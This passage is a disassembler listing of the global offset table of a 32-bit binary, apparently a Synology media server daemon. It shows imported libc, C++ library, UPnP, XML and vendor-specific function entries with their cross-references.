.got.plt:080BA2D8 ; std::basic_filebuf<char,std::char_traits<char>>::open(char const*,std::_Ios_Openmode)\n .got.plt:080BA2DC off_80BA2DC dd offset _ZSt17__throw_bad_allocv\n .got.plt:080BA2DC ; DATA XREF: std::__throw_bad_alloc(void)r\n .got.plt:080BA2DC ; std::__throw_bad_alloc(void)\n .got.plt:080BA2E0 off_80BA2E0 dd offset open64 ; DATA XREF: _open64r\n .got.plt:080BA2E4 off_80BA2E4 dd offset _ZN11MediaServer13DMSClientList10UpdateKeysERKSsS2_S2_RKSt3mapISsSsSt4lessISsESaISt4pairIS1_SsEEE\n .got.plt:080BA2E4 ; DATA XREF: MediaServer::DMSClientList::UpdateKeys(std::string const&,std::string const&,std::string const&,std::map<std::string,std::string,std::less<std::string>,std::allocator<std::pair<std::string const,std::string>>> const&)r\n .got.plt:080BA2E4 ; MediaServer::DMSClientList::UpdateKeys(std::string const&,std::string const&,std::string const&,std::map<std::string,std::string,std::less<std::string>,std::allocator<std::pair<std::string const,std::string>>> const&)\n .got.plt:080BA2E8 off_80BA2E8 dd offset _ZNK7pcrecpp2RE12PartialMatchERKNS_11StringPieceERKNS_3ArgES6_S6_S6_S6_S6_S6_S6_S6_S6_S6_S6_S6_S6_S6_S6_\n .got.plt:080BA2E8 ; DATA XREF: pcrecpp::RE::PartialMatch(pcrecpp::StringPiece const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&)r\n .got.plt:080BA2E8 ; pcrecpp::RE::PartialMatch(pcrecpp::StringPiece const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&,pcrecpp::Arg const&)\n .got.plt:080BA2EC off_80BA2EC dd offset strerror ; DATA XREF: _strerrorr\n .got.plt:080BA2F0 off_80BA2F0 dd offset pthread_cancel ; DATA XREF: _pthread_cancelr\n .got.plt:080BA2F4 off_80BA2F4 dd offset _ZN11MediaServer11DMSLogCloseEv\n .got.plt:080BA2F4 ; DATA XREF: sub_8084BDC:MediaServer::DMSLogClose(void)r\n .got.plt:080BA2F4 ; MediaServer::DMSLogClose(void)\n .got.plt:080BA2F8 off_80BA2F8 dd offset _ZN14SynoAudioUtils17SmartPLSListSongsEiiiRiRSt4listI21__tag_SYNO_MEDIA_INFOSaIS2_EEb\n .got.plt:080BA2F8 ; DATA XREF: SynoAudioUtils::SmartPLSListSongs(int,int,int,int &,std::list<__tag_SYNO_MEDIA_INFO,std::allocator<__tag_SYNO_MEDIA_INFO>> &,bool)r\n .got.plt:080BA2F8 ; SynoAudioUtils::SmartPLSListSongs(int,int,int,int &,std::list<__tag_SYNO_MEDIA_INFO,std::allocator<__tag_SYNO_MEDIA_INFO>> &,bool)\n .got.plt:080BA2FC off_80BA2FC dd offset termPQExpBuffer ; DATA XREF: _termPQExpBufferr\n .got.plt:080BA300 off_80BA300 dd offset dirname ; DATA XREF: _dirnamer\n .got.plt:080BA304 off_80BA304 dd offset _ZNKSs7compareEPKc\n .got.plt:080BA304 ; DATA XREF: std::string::compare(char const*)r\n .got.plt:080BA304 ; std::string::compare(char const*)\n .got.plt:080BA308 off_80BA308 dd offset __cxa_atexit ; DATA XREF: ___cxa_atexitr\n .got.plt:080BA30C off_80BA30C dd offset __errno_location ; DATA XREF: ___errno_locationr\n .got.plt:080BA310 off_80BA310 dd offset _ZN11MediaServer13DMSClientListC1Ev\n .got.plt:080BA310 ; DATA XREF: MediaServer::DMSClientList::DMSClientList(void)r\n .got.plt:080BA310 ; MediaServer::DMSClientList::DMSClientList(void)\n .got.plt:080BA314 off_80BA314 dd offset MediaInfoDBClose ; DATA XREF: _MediaInfoDBCloser\n .got.plt:080BA318 off_80BA318 dd offset _ZN14SynoAudioUtils16SmartPLSGetCountEv\n .got.plt:080BA318 ; DATA XREF: SynoAudioUtils::SmartPLSGetCount(void)r\n .got.plt:080BA318 ; SynoAudioUtils::SmartPLSGetCount(void)\n .got.plt:080BA31C off_80BA31C dd offset _ZN11MediaServer17DMSFormatUPNPDateEPKc\n .got.plt:080BA31C ; DATA XREF: MediaServer::DMSFormatUPNPDate(char const*)r\n .got.plt:080BA31C ; MediaServer::DMSFormatUPNPDate(char const*)\n .got.plt:080BA320 off_80BA320 dd offset _ZN14SynoAudioUtils20SmartPLSGetSongCountEib\n .got.plt:080BA320 ; DATA XREF: SynoAudioUtils::SmartPLSGetSongCount(int,bool)r\n .got.plt:080BA320 ; SynoAudioUtils::SmartPLSGetSongCount(int,bool)\n .got.plt:080BA324 off_80BA324 dd offset _ZSt28_Rb_tree_rebalance_for_erasePSt18_Rb_tree_node_baseRS_\n .got.plt:080BA324 ; DATA XREF: std::_Rb_tree_rebalance_for_erase(std::_Rb_tree_node_base *,std::_Rb_tree_node_base&)r\n .got.plt:080BA324 ; std::_Rb_tree_rebalance_for_erase(std::_Rb_tree_node_base *,std::_Rb_tree_node_base&)\n .got.plt:080BA328 off_80BA328 dd offset access ; DATA XREF: _accessr\n .got.plt:080BA32C off_80BA32C dd offset ixmlDocument_free\n .got.plt:080BA32C ; DATA XREF: _ixmlDocument_freer\n .got.plt:080BA330 off_80BA330 dd offset ixmlPrintDocument\n .got.plt:080BA330 ; DATA XREF: _ixmlPrintDocumentr\n .got.plt:080BA334 off_80BA334 dd offset ixmlNode_getAttributes\n .got.plt:080BA334 ; DATA XREF: _ixmlNode_getAttributesr\n .got.plt:080BA338 off_80BA338 dd offset inet_ntoa ; DATA XREF: _inet_ntoar\n .got.plt:080BA33C off_80BA33C dd offset _ZNSt13basic_filebufIcSt11char_traitsIcEEC1Ev\n .got.plt:080BA33C ; DATA XREF: std::basic_filebuf<char,std::char_traits<char>>::basic_filebuf(void)r\n .got.plt:080BA33C ; std::basic_filebuf<char,std::char_traits<char>>::basic_filebuf(void)\n .got.plt:080BA340 off_80BA340 dd offset ixmlNode_getChildNodes\n .got.plt:080BA340 ; DATA XREF: _ixmlNode_getChildNodesr\n .got.plt:080BA344 off_80BA344 dd offset _ZN11MediaServer15XMLEnumElementsEP10_IXML_NodeRKSs\n .got.plt:080BA344 ; DATA XREF: MediaServer::XMLEnumElements(_IXML_Node *,std::string const&)r\n .got.plt:080BA344 ; MediaServer::XMLEnumElements(_IXML_Node *,std::string const&)\n .got.plt:080BA348 off_80BA348 dd offset _ZNSs7reserveEj\n .got.plt:080BA348 ; DATA XREF: std::string::reserve(uint)r\n .got.plt:080BA348 ; std::string::reserve(uint)\n .got.plt:080BA34C off_80BA34C dd offset pcre_get_substring_list\n .got.plt:080BA34C ; DATA XREF: _pcre_get_substring_listr\n .got.plt:080BA350 off_80BA350 dd offset _ZNKSs4findEPKcjj\n .got.plt:080BA350 ; DATA XREF: std::string::find(char const*,uint,uint)r\n .got.plt:080BA350 ; std::string::find(char const*,uint,uint)\n .got.plt:080BA354 off_80BA354 dd offset malloc ; DATA XREF: _mallocr\n .got.plt:080BA358 off_80BA358 dd offset ixmlCloneDOMString\n .got.plt:080BA358 ; DATA XREF: _ixmlCloneDOMStringr\n .got.plt:080BA35C off_80BA35C dd offset pthread_mutex_init\n .got.plt:080BA35C ; DATA XREF: _pthread_mutex_initr\n .got.plt:080BA360 off_80BA360 dd offset fscanf ; DATA XREF: _fscanfr\n .got.plt:080BA364 off_80BA364 dd offset _ZNSsC1ERKSsjj\n .got.plt:080BA364 ; DATA XREF: std::string::string(std::string const&,uint,uint)r\n .got.plt:080BA364 ; std::string::string(std::string const&,uint,uint)\n .got.plt:080BA368 off_80BA368 dd offset SLIBCFileGetKeyValue\n .got.plt:080BA368 ; DATA XREF: _SLIBCFileGetKeyValuer\n .got.plt:080BA36C off_80BA36C dd offset fread ; DATA XREF: _freadr\n .got.plt:080BA370 off_80BA370 dd offset memmove ; DATA XREF: _memmover\n .got.plt:080BA374 off_80BA374 dd offset _ZN11MediaServer23XMLGetFirstDocumentItemEP14_IXML_DocumentPKcPb\n .got.plt:080BA374 ; DATA XREF: MediaServer::XMLGetFirstDocumentItem(_IXML_Document *,char const*,bool *)r\n .got.plt:080BA374 ; MediaServer::XMLGetFirstDocumentItem(_IXML_Document *,char const*,bool *)\n .got.plt:080BA378 off_80BA378 dd offset _ZN11MediaServer16DMSClientChecker13GetOffendCharEv\n .got.plt:080BA378 ; DATA XREF: MediaServer::DMSClientChecker::GetOffendChar(void)r\n .got.plt:080BA378 ; MediaServer::DMSClientChecker::GetOffendChar(void)\n .got.plt:080BA37C off_80BA37C dd offset _ZN11MediaServer13StringExplodeERKSsS1_\n .got.plt:080BA37C ; DATA XREF: MediaServer::StringExplode(std::string const&,std::string const&)r\n .got.plt:080BA37C ; MediaServer::StringExplode(std::string const&,std::string const&)\n .got.plt:080BA380 off_80BA380 dd offset _ZNSt12__basic_fileIcED1Ev\n .got.plt:080BA380 ; DATA XREF: std::__basic_file<char>::~__basic_file()r\n .got.plt:080BA380 ; std::__basic_file<char>::~__basic_file()\n .got.plt:080BA384 off_80BA384 dd offset syslog ; DATA XREF: _syslogr\n .got.plt:080BA388 off_80BA388 dd offset daemon ; DATA XREF: _daemonr\n .got.plt:080BA38C off_80BA38C dd offset ixmlNamedNodeMap_free\n .got.plt:080BA38C ; DATA XREF: _ixmlNamedNodeMap_freer\n .got.plt:080BA390 off_80BA390 dd offset _ZNSs6appendERKSs\n .got.plt:080BA390 ; DATA XREF: std::string::append(std::string const&)r\n .got.plt:080BA390 ; std::string::append(std::string const&)\n .got.plt:080BA394 off_80BA394 dd offset _ZN11MediaServer12GetCoverListERSt6vectorISsSaISsEE\n .got.plt:080BA394 ; DATA XREF: MediaServer::GetCoverList(std::vector<std::string,std::allocator<std::string>> &)r\n .got.plt:080BA394 ; MediaServer::GetCoverList(std::vector<std::string,std::allocator<std::string>> &)\n .got.plt:080BA398 off_80BA398 dd offset UpnpAddToActionResponse\n .got.plt:080BA398 ; DATA XREF: _UpnpAddToActionResponser\n .got.plt:080BA39C off_80BA39C dd offset _ZN11MediaServer14DMSLOGSetLevelENS_12DMSLOG_LEVELE\n .got.plt:080BA39C ; DATA XREF: MediaServer::DMSLOGSetLevel(MediaServer::DMSLOG_LEVEL)r\n .got.plt:080BA39C ; MediaServer::DMSLOGSetLevel(MediaServer::DMSLOG_LEVEL)\n .got.plt:080BA3A0 off_80BA3A0 dd offset _ZN11MediaServer7MediaDB7NextRowEv\n .got.plt:080BA3A0 ; DATA XREF: MediaServer::MediaDB::NextRow(void)r\n .got.plt:080BA3A0 ; MediaServer::MediaDB::NextRow(void)\n .got.plt:080BA3A4 off_80BA3A4 dd offset _ZNSsD1Ev ; DATA XREF: std::string::~string()r\n .got.plt:080BA3A4 ; std::string::~string()\n .got.plt:080BA3A8 off_80BA3A8 dd offset _ZN11MediaServer16DMSClientChecker19getVideoProfileNameEPK21__tag_SYNO_MEDIA_INFO\n .got.plt:080BA3A8 ; DATA XREF: MediaServer::DMSClientChecker::getVideoProfileName(__tag_SYNO_MEDIA_INFO const*)r\n .got.plt:080BA3A8 ; MediaServer::DMSClientChecker::getVideoProfileName(__tag_SYNO_MEDIA_INFO const*)\n .got.plt:080BA3AC off_80BA3AC dd offset __cxa_allocate_exception\n .got.plt:080BA3AC ; DATA XREF: ___cxa_allocate_exceptionr\n .got.plt:080BA3B0 off_80BA3B0 dd offset UpnpNotify ; DATA XREF: _UpnpNotifyr\n .got.plt:080BA3B4 off_80BA3B4 dd offset _ZN11MediaServer24FileGetPathBaseNameNoExtERKSs\n .got.plt:080BA3B4 ; DATA XREF: MediaServer::FileGetPathBaseNameNoExt(std::string const&)r\n .got.plt:080BA3B4 ; MediaServer::FileGetPathBaseNameNoExt(std::string const&)\n .got.plt:080BA3B8 off_80BA3B8 dd offset _ZN11MediaServer21DMSFormatUPNPDurationEi\n .got.plt:080BA3B8 ; DATA XREF: MediaServer::DMSFormatUPNPDuration(int)r\n .got.plt:080BA3B8 ; MediaServer::DMSFormatUPNPDuration(int)\n .got.plt:080BA3BC off_80BA3BC dd offset _ZN4Json5ValueC1Ei\n .got.plt:080BA3BC ; DATA XREF: Json::Value::Value(int)r\n .got.plt:080BA3BC ; Json::Value::Value(int)\n .got.plt:080BA3C0 off_80BA3C0 dd offset ixmlNode_getNodeValue\n .got.plt:080BA3C0 ; DATA XREF: _ixmlNode_getNodeValuer\n .got.plt:080BA3C4 off_80BA3C4 dd offset _ZN11MediaServer18DMSGetProductModelEv\n .got.plt:080BA3C4 ; DATA XREF: MediaServer::DMSGetProductModel(void)r\n .got.plt:080BA3C4 ; MediaServer::DMSGetProductModel(void)\n .got.plt:080BA3C8 off_80BA3C8 dd offset time ; DATA XREF: _timer\n .got.plt:080BA3CC off_80BA3CC dd offset BlSYNOIndexIsRawImage\n .got.plt:080BA3CC ; DATA XREF: _BlSYNOIndexIsRawImager\n .got.plt:080BA3D0 off_80BA3D0 dd offset _ZN11MediaServer15DMSStringBundle13ImportStringsEv\n .got.plt:080BA3D0 ; DATA XREF: MediaServer::DMSStringBundle::ImportStrings(void)r\n .got.plt:080BA3D0 ; MediaServer::DMSStringBundle::ImportStrings(void)\n .got.plt:080BA3D4 off_80BA3D4 dd offset ixmlNodeList_item\n .got.plt:080BA3D4 ; DATA XREF: _ixmlNodeList_itemr\n .got.plt:080BA3D8 off_80BA3D8 dd offset pthread_mutex_lock\n .got.plt:080BA3D8 ; DATA XREF: _pthread_mutex_lockr\n .got.plt:080BA3DC off_80BA3DC dd offset _ZN11MediaServer18FileGetPathDirNameERKSs\n .got.plt:080BA3DC ; DATA XREF: MediaServer::FileGetPathDirName(std::string const&)r\n .got.plt:080BA3DC ; MediaServer::FileGetPathDirName(std::string const&)\n .got.plt:080BA3E0 off_80BA3E0 dd offset UpnpFinish ; DATA XREF: _UpnpFinishr\n .got.plt:080BA3E4 off_80BA3E4 dd offset _ZNSs4_Rep10_M_destroyERKSaIcE\n .got.plt:080BA3E4 ; DATA XREF: std::string::_Rep::_M_destroy(std::allocator<char> const&)r\n .got.plt:080BA3E4 ; std::string::_Rep::_M_destroy(std::allocator<char> const&)\n .got.plt:080BA3E8 off_80BA3E8 dd offset _ZN14SynoAudioUtils9RadioInitEv\n .got.plt:080BA3E8 ; DATA XREF: SynoAudioUtils::RadioInit(void)r\n .got.plt:080BA3E8 ; SynoAudioUtils::RadioInit(void)\n .got.plt:080BA3EC off_80BA3EC dd offset ixmlNode_getNodeName\n .got.plt:080BA3EC ; DATA XREF: _ixmlNode_getNodeNamer\n .got.plt:080BA3F0 off_80BA3F0 dd offset _ZN11MediaServer22DMSGetNetworkInterfaceERSt3mapISsSsSt4lessISsESaISt4pairIKSsSsEEE\n .got.plt:080BA3F0 ; DATA XREF: MediaServer::DMSGetNetworkInterface(std::map<std::string,std::string,std::less<std::string>,std::allocator<std::pair<std::string const,std::string>>> &)r\n .got.plt:080BA3F0 ; MediaServer::DMSGetNetworkInterface(std::map<std::string,std::string,std::less<std::string>,std::allocator<std::pair<std::string const,std::string>>> &)\n .got.plt:080BA3F4 off_80BA3F4 dd offset strstr ; DATA XREF: _strstrr\n .got.plt:080BA3F8 off_80BA3F8 dd offset sleep ; DATA XREF: _sleepr\n .got.plt:080BA3FC off_80BA3FC dd offset _ZN11MediaServer9XMLEscapeERKSsPKc\n .got.plt:080BA3FC ; DATA XREF: MediaServer::XMLEscape(std::string const&,char const*)r\n .got.plt:080BA3FC ; MediaServer::XMLEscape(std::string const&,char const*)\n .got.plt:080BA400 off_80BA400 dd offset MediaInfoDBOpen ; DATA XREF: _MediaInfoDBOpenr\n .got.plt:080BA404 off_80BA404 dd offset __strtol_internal\n .got.plt:080BA404 ; DATA XREF: ___strtol_internalr\n .got.plt:080BA408 off_80BA408 dd offset pthread_setspecific\n .got.plt:080BA408 ; DATA XREF: _pthread_setspecificr\n .got.plt:080BA40C off_80BA40C dd offset pthread_key_create\n .got.plt:080BA40C ; DATA XREF: _pthread_key_creater\n .got.plt:080BA410 off_80BA410 dd offset _ZNSsC1ERKSs ; DATA XREF: std::string::string(std::string const&)r\n .got.plt:080BA410 ; std::string::string(std::string const&)\n .got.plt:080BA414 off_80BA414 dd offset UpnpAcceptSubscription\n .got.plt:080BA414 ; DATA XREF: _UpnpAcceptSubscriptionr\n .got.plt:080BA418 off_80BA418 dd offset __cxa_begin_catch\n .got.plt:080BA418 ; DATA XREF: ___cxa_begin_catchr\n .got.plt:080BA41C off_80BA41C dd offset _ZN11MediaServer13DMSClientList11FindMacByIPERKSs\n .got.plt:080BA41C ; DATA XREF: MediaServer::DMSClientList::FindMacByIP(std::string const&)r\n .got.plt:080BA41C ; MediaServer::DMSClientList::FindMacByIP(std::string const&)\n .got.plt:080BA420 off_80BA420 dd offset _Znaj ; DATA XREF: operator new[](uint)r\n .got.plt:080BA420 ; operator new[](uint)\n .got.plt:080BA424 off_80BA424 dd offset _ZN14SynoAudioUtils19RadioGetStationDataEjjRNS_12RadioStationE\n .got.plt:080BA424 ; DATA XREF: SynoAudioUtils::RadioGetStationData(uint,uint,SynoAudioUtils::RadioStation &)r\n .got.plt:080BA424 ; SynoAudioUtils::RadioGetStationData(uint,uint,SynoAudioUtils::RadioStation &)\n .got.plt:080BA428 off_80BA428 dd offset __xstat64 ; DATA XREF: ___xstat64r\n .got.plt:080BA42C off_80BA42C dd offset _ZSt18_Rb_tree_decrementPSt18_Rb_tree_node_base\n .got.plt:080BA42C ; DATA XREF: std::_Rb_tree_decrement(std::_Rb_tree_node_base *)r\n .got.plt:080BA42C ; std::_Rb_tree_decrement(std::_Rb_tree_node_base *)\n .got.plt:080BA430 off_80BA430 dd offset _ZNSsC1EPKcRKSaIcE\n .got.plt:080BA430 ; DATA XREF: std::string::string(char const*,std::allocator<char> const&)r\n .got.plt:080BA430 ; std::string::string(char const*,std::allocator<char> const&)\n .got.plt:080BA434 off_80BA434 dd offset initPQExpBuffer ; DATA XREF: _initPQExpBufferr\n .got.plt:080BA438 off_80BA438 dd offset pcre_compile ; DATA XREF: _pcre_compiler\n .got.plt:080BA43C off_80BA43C dd offset _ZN11MediaServer14DMSLOGGetLevelEv\n .got.plt:080BA43C ; DATA XREF: MediaServer::DMSLOGGetLevel(void)r\n .got.plt:080BA43C ; MediaServer::DMSLOGGetLevel(void)\n .got.plt:080BA440 off_80BA440 dd offset SYNODBConnect ; DATA XREF: _SYNODBConnectr\n .got.plt:080BA444 off_80BA444 dd offset _ZN11MediaServer16DMSClientCheckerC1ERKSsS2_b\n .got.plt:080BA444 ; DATA XREF: MediaServer::DMSClientChecker::DMSClientChecker(std::string const&,std::string const&,bool)r\n .got.plt:080BA444 ; MediaServer::DMSClientChecker::DMSClientChecker(std::string const&,std::string const&,bool)\n .got.plt:080BA448 off_80BA448 dd offset _ZN14SynoAudioUtils12SmartPLSEnumEiiRiPKc\n .got.plt:080BA448 ; DATA XREF: SynoAudioUtils::SmartPLSEnum(int,int,int &,char const*)r\n .got.plt:080BA448 ; SynoAudioUtils::SmartPLSEnum(int,int,int &,char const*)\n .got.plt:080BA44C off_80BA44C dd offset _ZN11MediaServer13StringToLowerERKSs\n .got.plt:080BA44C ; DATA XREF: MediaServer::StringToLower(std::string const&)r\n .got.plt:080BA44C ; MediaServer::StringToLower(std::string const&)\n .got.plt:080BA450 off_80BA450 dd offset __libc_start_main\n .got.plt:080BA450 ; DATA XREF: ___libc_start_mainr\n .got.plt:080BA454 off_80BA454 dd offset _ZN11MediaServer7MediaDB11SelectTotalEv\n .got.plt:080BA454 ; DATA XREF: MediaServer::MediaDB::SelectTotal(void)r\n .got.plt:080BA454 ; MediaServer::MediaDB::SelectTotal(void)\n .got.plt:080BA458 off_80BA458 dd offset _ZN11MediaServer21DMSGetMediaFolderPathE21_tag_MEDIA_TABLE_TYPE\n .got.plt:080BA458 ; DATA XREF: MediaServer::DMSGetMediaFolderPath(_tag_MEDIA_TABLE_TYPE)r\n .got.plt:080BA458 ; MediaServer::DMSGetMediaFolderPath(_tag_MEDIA_TABLE_TYPE)\n .got.plt:080BA45C off_80BA45C dd offset _ZN11MediaServer13DMSClientList11WriteToFileEv\n .got.plt:080BA45C ; DATA XREF: MediaServer::DMSClientList::WriteToFile(void)r\n .got.plt:080BA45C ; MediaServer::DMSClientList::WriteToFile(void)\n .got.plt:080BA460 off_80BA460 dd offset _ZSt18_Rb_tree_incrementPSt18_Rb_tree_node_base\n .got.plt:080BA460 ; DATA XREF: std::_Rb_tree_increment(std::_Rb_tree_node_base *)r\n .got.plt:080BA460 ; std::_Rb_tree_increment(std::_Rb_tree_node_base *)\n .got.plt:080BA464 off_80BA464 dd offset _ZNSs14_M_replace_auxEjjjc\n .got.plt:080BA464 ; DATA XREF: std::string::_M_replace_aux(uint,uint,uint,char)r\n .got.plt:080BA464 ; std::string::_M_replace_aux(uint,uint,uint,char)\n .got.plt:080BA468 off_80BA468 dd offset _ZN11MediaServer20XMLGetAttributeValueEP10_IXML_NodeRKSs\n .got.plt:080BA468 ; DATA XREF: MediaServer::XMLGetAttributeValue(_IXML_Node *,std::string const&)r\n .got.plt:080BA468 ; MediaServer::XMLGetAttributeValue(_IXML_Node *,std::string const&)\n .got.plt:080BA46C off_80BA46C dd offset _ZNSs6appendEPKcj\n .got.plt:080BA46C ; DATA XREF: std::string::append(char const*,uint)r\n .got.plt:080BA46C ; std::string::append(char const*,uint)\n .got.plt:080BA470 off_80BA470 dd offset _Znwj ; DATA XREF: operator new(uint)r\n .got.plt:080BA470 ; operator new(uint)\n .got.plt:080BA474 off_80BA474 dd offset UpnpSetWebServerRootDir\n .got.plt:080BA474 ; DATA XREF: _UpnpSetWebServerRootDirr\n .got.plt:080BA478 off_80BA478 dd offset _ZN11MediaServer7MediaDBD1Ev\n .got.plt:080BA478 ; DATA XREF: MediaServer::MediaDB::~MediaDB()r\n .got.plt:080BA478 ; MediaServer::MediaDB::~MediaDB()\n .got.plt:080BA47C off_80BA47C dd offset SLIBCStrTokIndex ; DATA XREF: _SLIBCStrTokIndexr\n .got.plt:080BA480 off_80BA480 dd offset _ZN11MediaServer19XMLFindChildElementERKSsP10_IXML_Node\n .got.plt:080BA480 ; DATA XREF: MediaServer::XMLFindChildElement(std::string const&,_IXML_Node *)r\n .got.plt:080BA480 ; MediaServer::XMLFindChildElement(std::string const&,_IXML_Node *)\n .got.plt:080BA484 off_80BA484 dd offset _ZNSt8ios_baseD2Ev\n .got.plt:080BA484 ; DATA XREF: std::ios_base::~ios_base()r\n .got.plt:080BA484 ; std::ios_base::~ios_base()\n .got.plt:080BA488 off_80BA488 dd offset _ZSt29_Rb_tree_insert_and_rebalancebPSt18_Rb_tree_node_baseS0_RS_\n .got.plt:080BA488 ; DATA XREF: std::_Rb_tree_insert_and_rebalance(bool,std::_Rb_tree_node_base *,std::_Rb_tree_node_base *,std::_Rb_tree_node_base&)r\n .got.plt:080BA488 ; std::_Rb_tree_insert_and_rebalance(bool,std::_Rb_tree_node_base *,std::_Rb_tree_node_base *,std::_Rb_tree_node_base&)\n .got.plt:080BA48C off_80BA48C dd offset _ZN4Json5ValueaSERKS0_\n .got.plt:080BA48C ; DATA XREF: Json::Value::operator=(Json::Value const&)r\n .got.plt:080BA48C ; Json::Value::operator=(Json::Value const&)\n .got.plt:080BA490 off_80BA490 dd offset _ZN11MediaServer10DMSLOGInitEPKc\n .got.plt:080BA490 ; DATA XREF: MediaServer::DMSLOGInit(char const*)r\n .got.plt:080BA490 ; MediaServer::DMSLOGInit(char const*)\n .got.plt:080BA494 off_80BA494 dd offset MediaInfoDBGet ; DATA XREF: _MediaInfoDBGetr\n .got.plt:080BA498 off_80BA498 dd offset fclose ; DATA XREF: _fcloser\n .got.plt:080BA49C off_80BA49C dd offset _ZNSt9basic_iosIcSt11char_traitsIcEE5clearESt12_Ios_Iostate\n .got.plt:080BA49C ; DATA XREF: std::basic_ios<char,std::char_traits<char>>::clear(std::_Ios_Iostate)r\n .got.plt:080BA49C ; std::basic_ios<char,std::char_traits<char>>::clear(std::_Ios_Iostate)\n .got.plt:080BA4A0 off_80BA4A0 dd offset strrchr ; DATA XREF: _strrchrr\n .got.plt:080BA4A4 off_80BA4A4 dd offset SYNONetGetCard1 ; DATA XREF: _SYNONetGetCard1r\n .got.plt:080BA4A8 off_80BA4A8 dd offset _ZN11MediaServer21GetIndexLoacationPathERK21_tag_MEDIA_TABLE_TYPE\n .got.plt:080BA4A8 ; DATA XREF: MediaServer::GetIndexLoacationPath(_tag_MEDIA_TABLE_TYPE const&)r\n .got.plt:080BA4A8 ; MediaServer::GetIndexLoacationPath(_tag_MEDIA_TABLE_TYPE const&)\n .got.plt:080BA4AC off_80BA4AC dd offset _ZN11MediaServer9DMSPrintfENS_12DMSLOG_LEVELEPKcz\n .got.plt:080BA4AC ; DATA XREF: MediaServer::DMSPrintf(MediaServer::DMSLOG_LEVEL,char const*,...)r\n .got.plt:080BA4AC ; MediaServer::DMSPrintf(MediaServer::DMSLOG_LEVEL,char const*,...)\n .got.plt:080BA4B0 off_80BA4B0 dd offset fopen64 ; DATA XREF: _fopen64r\n .got.plt:080BA4B4 off_80BA4B4 dd offset UpnpGetServerPort\n .got.plt:080BA4B4 ; DATA XREF: _UpnpGetServerPortr\n .got.plt:080BA4B8 off_80BA4B8 dd offset _ZN14SynoAudioUtils14RadioGetGenresEiiRSt6vectorINS_10RadioGenreESaIS1_EERi\n .got.plt:080BA4B8 ; DATA XREF: SynoAudioUtils::RadioGetGenres(int,int,std::vector<SynoAudioUtils::RadioGenre,std::allocator<SynoAudioUtils::RadioGenre>> &,int &)r\n .got.plt:080BA4B8 ; SynoAudioUtils::RadioGetGenres(int,int,std::vector<SynoAudioUtils::RadioGenre,std::allocator<SynoAudioUtils::RadioGenre>> &,int &)\n .got.plt:080BA4BC off_80BA4BC dd offset _ZN11MediaServer16XMLEnumTagValuesEP10_IXML_NodeRKSs\n .got.plt:080BA4BC ; DATA XREF: MediaServer::XMLEnumTagValues(_IXML_Node *,std::string const&)r\n .got.plt:080BA4BC ; MediaServer::XMLEnumTagValues(_IXML_Node *,std::string const&)\n .got.plt:080BA4C0 off_80BA4C0 dd offset snprintf ; DATA XREF: _snprintfr\n .got.plt:080BA4C4 off_80BA4C4 dd offset gethostname ; DATA XREF: _gethostnamer\n .got.plt:080BA4C8 off_80BA4C8 dd offset _ZN11MediaServer16DMSClientChecker15InitProfileListERKSs\n .got.plt:080BA4C8 ; DATA XREF: MediaServer::DMSClientChecker::InitProfileList(std::string const&)r\n .got.plt:080BA4C8 ; MediaServer::DMSClientChecker::InitProfileList(std::string const&)\n .got.plt:080BA4CC off_80BA4CC dd offset __cxa_pure_virtual\n .got.plt:080BA4CC ; DATA XREF: ___cxa_pure_virtualr\n .got.plt:080BA4D0 off_80BA4D0 dd offset strcasecmp ; DATA XREF: _strcasecmpr\n .got.plt:080BA4D4 off_80BA4D4 dd offset mkstemp64 ; DATA XREF: _mkstemp64r\n .got.plt:080BA4D8 off_80BA4D8 dd offset inet_ntop ; DATA XREF: _inet_ntopr\n .got.plt:080BA4DC off_80BA4DC dd offset _ZSt20__throw_length_errorPKc\n .got.plt:080BA4DC ; DATA XREF: std::__throw_length_error(char const*)r\n .got.plt:080BA4DC ; std::__throw_length_error(char const*)\n .got.plt:080BA4E0 off_80BA4E0 dd offset _ZdaPv ; DATA XREF: operator delete[](void *)r\n .got.plt:080BA4E0 ; operator delete[](void *)\n .got.plt:080BA4E4 off_80BA4E4 dd offset exit ; DATA XREF: _exitr\n .got.plt:080BA4E8 off_80BA4E8 dd offset ixmlNode_getNodeType\n .got.plt:080BA4E8 ; DATA XREF: _ixmlNode_getNodeTyper\n .got.plt:080BA4EC off_80BA4EC dd offset UpnpSetDescURL ; DATA XREF: _UpnpSetDescURLr\n .got.plt:080BA4F0 off_80BA4F0 dd offset _ZNSs6assignERKSs\n .got.plt:080BA4F0 ; DATA XREF: std::string::assign(std::string const&)r\n .got.plt:080BA4F0 ; std::string::assign(std::string const&)\n .got.plt:080BA4F4 off_80BA4F4 dd offset _ZN11MediaServer18SQLEscapeConditionERKSs\n .got.plt:080BA4F4 ; DATA XREF: MediaServer::SQLEscapeCondition(std::string const&)r\n .got.plt:080BA4F4 ; MediaServer::SQLEscapeCondition(std::string const&)\n .got.plt:080BA4F8 off_80BA4F8 dd offset _ZN11MediaServer15SQLEscapeStringERKSs\n .got.plt:080BA4F8 ; DATA XREF: MediaServer::SQLEscapeString(std::string const&)r\n .got.plt:080BA4F8 ; MediaServer::SQLEscapeString(std::string const&)\n .got.plt:080BA4FC off_80BA4FC dd offset SLIBNetGetInterfaceInfo\n .got.plt:080BA4FC ; DATA XREF: _SLIBNetGetInterfaceInfor\n .got.plt:080BA500 off_80BA500 dd offset free ; DATA XREF: _freer\n .got.plt:080BA504 off_80BA504 dd offset _ZN11MediaServer9URLEncodeERKSs\n .got.plt:080BA504 ; DATA XREF: MediaServer::URLEncode(std::string const&)r\n .got.plt:080BA504 ; MediaServer::URLEncode(std::string const&)\n .got.plt:080BA508 off_80BA508 dd offset _ZNSs12_M_leak_hardEv\n .got.plt:080BA508 ; DATA XREF: std::string::_M_leak_hard(void)r\n .got.plt:080BA508 ; 